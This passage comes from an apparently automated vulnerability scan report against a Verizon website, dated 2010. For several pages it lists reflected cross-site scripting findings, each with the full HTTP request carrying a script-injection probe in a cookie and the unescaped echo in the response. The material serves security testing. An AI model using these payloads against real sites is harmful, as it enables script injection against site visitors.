Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX71be6'><script>alert(1)</script>1284a5ad464; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 141437
Expires: Sat, 20 Nov 2010 01:56:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:56:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:56:11 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:56:11 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:56:11 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Leadership Team - Overview
</title><link rel="stylesheet" type="text/css" href="/Content/Microsites/Includes/CSS/executi
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX71BE6'><SCRIPT>ALERT(1)</SCRIPT>1284A5AD464 ' />
...[SNIP]...

1.32. http://www22.verizon.com/Content/LearnShop/Templates/AboutFiOS/Overview.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/LearnShop/Templates/AboutFiOS/Overview.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 695bb<script>alert(1)</script>f978245bac3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/LearnShop/Templates/AboutFiOS/Overview.aspx?NRMODE=Published&NRNODEGUID=%7bF9227CB3-4C5B-4F37-BD11-4F487E059674%7d&NRORIGINALURL=%2fResidential%2faboutFiOS%2fOverview%2ehtm&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX695bb<script>alert(1)</script>f978245bac3; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70905
Expires: Sat, 20 Nov 2010 01:57:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:57:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:57:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX695bb<script>alert(1)</script>f978245bac3; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:57:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:57:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:57:18 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX695BB<SCRIPT>ALERT(1)</SCRIPT>F978245BAC3 </DIV>
...[SNIP]...

1.33. http://www22.verizon.com/Content/LearnShop/Templates/AboutFiOS/Overview.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/LearnShop/Templates/AboutFiOS/Overview.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d29e7'><script>alert(1)</script>955a6a276cd was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/LearnShop/Templates/AboutFiOS/Overview.aspx?NRMODE=Published&NRNODEGUID=%7bF9227CB3-4C5B-4F37-BD11-4F487E059674%7d&NRORIGINALURL=%2fResidential%2faboutFiOS%2fOverview%2ehtm&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXd29e7'><script>alert(1)</script>955a6a276cd; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70909
Expires: Sat, 20 Nov 2010 01:57:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:57:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:57:17 GMT; path=/
Set-Cookie: ContextInfo_State=TXd29e7'><script>alert(1)</script>955a6a276cd; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:57:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:57:17 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:57:17 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD29E7'><SCRIPT>ALERT(1)</SCRIPT>955A6A276CD ' />
...[SNIP]...

1.34. http://www22.verizon.com/Content/LearnShop/Templates/Bundles/Overview.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/LearnShop/Templates/Bundles/Overview.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 32d05'><script>alert(1)</script>c6bec81b34 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/LearnShop/Templates/Bundles/Overview.aspx?NRMODE=Published&NRNODEGUID=%7b0ECAE15E-8F92-465E-B27B-6897F0CAB2C4%7d&NRORIGINALURL=%2fresidential%2fbundles%2foverview&NRCACHEHINT=Guest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX32d05'><script>alert(1)</script>c6bec81b34; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112495
Expires: Sat, 20 Nov 2010 01:56:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:56:25 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:56:25 GMT; path=/
Set-Cookie: ContextInfo_State=TX32d05'><script>alert(1)</script>c6bec81b34; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:56:25 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:56:25 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:56:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX32D05'><SCRIPT>ALERT(1)</SCRIPT>C6BEC81B34 ' />
...[SNIP]...

1.35. http://www22.verizon.com/Content/LearnShop/Templates/Bundles/Overview.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/LearnShop/Templates/Bundles/Overview.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 451ea<script>alert(1)</script>402101dda66 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/LearnShop/Templates/Bundles/Overview.aspx?NRMODE=Published&NRNODEGUID=%7b0ECAE15E-8F92-465E-B27B-6897F0CAB2C4%7d&NRORIGINALURL=%2fresidential%2fbundles%2foverview&NRCACHEHINT=Guest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX451ea<script>alert(1)</script>402101dda66; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112493
Expires: Sat, 20 Nov 2010 01:56:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:56:25 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:56:25 GMT; path=/
Set-Cookie: ContextInfo_State=TX451ea<script>alert(1)</script>402101dda66; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:56:25 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:56:25 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:56:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX451EA<SCRIPT>ALERT(1)</SCRIPT>402101DDA66 </DIV>
...[SNIP]...

1.36. http://www22.verizon.com/ForyourHome/Registration/Reg/BundleLoginAlone.aspx [RegistrationApp cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ForyourHome/Registration/Reg/BundleLoginAlone.aspx

Issue detail

The value of the RegistrationApp cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d200"-alert(1)-"ba6859215db was submitted in the RegistrationApp cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ForyourHome/Registration/Reg/BundleLoginAlone.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a6d200"-alert(1)-"ba6859215db; CMS_TimeZoneOffset=360; vzapps=STATE=TX; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA14V
Content-Type: text/html; charset=utf-8
Content-Length: 22835
Expires: Sat, 20 Nov 2010 02:35:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:35:53 GMT
Connection: close
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6cf45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>BundleLoginSignin</title>
       <LINK href="../styles/vz_com_header_new.css" type="text/css" rel="stylesheet">
...[SNIP]...
USTOM 3
           hbx.hc4="";//CUSTOM 4
           hbx.hrf="";//CUSTOM REFERRER
           hbx.pec="";//ERROR CODES
           //Added by Hbx request
           var cv = _hbEvent("cv");
           cv.c8 = "293e47b8-02f1-4184-8a59-1a5fb423293a6d200"-alert(1)-"ba6859215db|Others-Other"

           //INSERT CUSTOM EVENTS
           //hbx.onlyMedia="y";
           //END EDITABLE SECTION
           </script>
...[SNIP]...

1.37. http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 43d22<script>alert(1)</script>b988849fa6f was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX43d22<script>alert(1)</script>b988849fa6f; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112600
Expires: Sat, 20 Nov 2010 01:44:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:44:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:44:31 GMT; path=/
Set-Cookie: ContextInfo_State=TX43d22<script>alert(1)</script>b988849fa6f; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:31 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:31 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:31 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX43D22<SCRIPT>ALERT(1)</SCRIPT>B988849FA6F </DIV>
...[SNIP]...

1.38. http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3b892'><script>alert(1)</script>c45c0f7824f was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX3b892'><script>alert(1)</script>c45c0f7824f; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112604
Expires: Sat, 20 Nov 2010 01:44:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:44:29 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:44:29 GMT; path=/
Set-Cookie: ContextInfo_State=TX3b892'><script>alert(1)</script>c45c0f7824f; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:29 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:29 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:44:29 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX3B892'><SCRIPT>ALERT(1)</SCRIPT>C45C0F7824F ' />
...[SNIP]...

1.39. http://www22.verizon.com/Residential/Bundles/Landing/FlexView/FlexView [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/FlexView/FlexView

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload dbc66<script>alert(1)</script>a161582328c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

